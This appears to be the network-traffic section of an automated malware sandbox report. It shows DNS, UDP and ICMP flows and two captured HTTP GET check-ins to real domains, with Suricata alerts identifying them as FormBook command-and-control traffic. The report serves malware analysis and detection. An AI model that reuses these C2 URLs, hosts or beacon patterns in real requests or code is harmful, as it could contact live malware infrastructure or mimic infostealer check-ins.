Network Analysis
Name | Response | Post-Analysis Lookup |
---|---|---|
www.maurice-paetzold.com |
CNAME
maurice-paetzold.com
|
81.169.145.151 |
www.alkemymedia.com |
CNAME
alkemymedia.com
|
3.33.152.147 |
www.joannamulderlcpc.online |
- UDP Requests
-
-
192.168.56.103:50800 164.124.101.2:53
-
192.168.56.103:52760 164.124.101.2:53
-
192.168.56.103:53673 164.124.101.2:53
-
192.168.56.103:62576 164.124.101.2:53
-
192.168.56.103:64894 164.124.101.2:53
-
192.168.56.103:137 192.168.56.101:137
-
192.168.56.103:137 192.168.56.255:137
-
192.168.56.103:138 192.168.56.255:138
-
192.168.56.103:49154 239.255.255.250:1900
-
8.8.8.8:53 192.168.56.103:52760
-
GET
403
http://www.alkemymedia.com/o6g2/?T6hH=TcJYskQeIEqvLoDqB2cxRl9kId57yTXFVFAzbVPo9SRnnSNvkE6PeNWURLP+oM0+OEqqsFHA&wPT=mf5T
REQUEST
RESPONSE
BODY
GET /o6g2/?T6hH=TcJYskQeIEqvLoDqB2cxRl9kId57yTXFVFAzbVPo9SRnnSNvkE6PeNWURLP+oM0+OEqqsFHA&wPT=mf5T HTTP/1.1
Host: www.alkemymedia.com
Connection: close
HTTP/1.1 403 Forbidden
Server: awselb/2.0
Date: Tue, 31 Oct 2023 08:45:41 GMT
Content-Type: text/html
Content-Length: 118
Connection: close
GET
301
http://www.maurice-paetzold.com/o6g2/?T6hH=MnMOobRyqH3XeIZSi0NOa/chdJyQ39ZlT6TVPdZ+J13HVMjUNzv4ngmdbhRoHvqCPt2c+K/j&wPT=mf5T
REQUEST
RESPONSE
BODY
GET /o6g2/?T6hH=MnMOobRyqH3XeIZSi0NOa/chdJyQ39ZlT6TVPdZ+J13HVMjUNzv4ngmdbhRoHvqCPt2c+K/j&wPT=mf5T HTTP/1.1
Host: www.maurice-paetzold.com
Connection: close
HTTP/1.1 301 Moved Permanently
Date: Tue, 31 Oct 2023 08:46:02 GMT
Server: Apache/2.4.57 (Unix)
X-Powered-By: PHP/7.4.33
Expires: Wed, 11 Jan 1984 05:00:00 GMT
Cache-Control: no-cache, must-revalidate, max-age=0
X-Redirect-By: WordPress
Location: http://maurice-paetzold.com/o6g2/?T6hH=MnMOobRyqH3XeIZSi0NOa/chdJyQ39ZlT6TVPdZ+J13HVMjUNzv4ngmdbhRoHvqCPt2c+K/j&wPT=mf5T
Content-Type: text/html; charset=UTF-8
Content-Length: 0
Connection: close
ICMP traffic
Source | Destination | ICMP Type | Data |
---|---|---|---|
192.168.56.103 | 164.124.101.2 | 3 | |
192.168.56.103 | 164.124.101.2 | 3 | |
192.168.56.103 | 164.124.101.2 | 3 |
IRC traffic
No IRC requests performed.
Suricata Alerts
Flow | SID | Signature | Category |
---|---|---|---|
TCP 192.168.56.103:49170 -> 81.169.145.151:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
TCP 192.168.56.103:49169 -> 3.33.152.147:80 | 2031412 | ET MALWARE FormBook CnC Checkin (GET) | Malware Command and Control Activity Detected |
Suricata TLS
No Suricata TLS
Snort Alerts
No Snort Alerts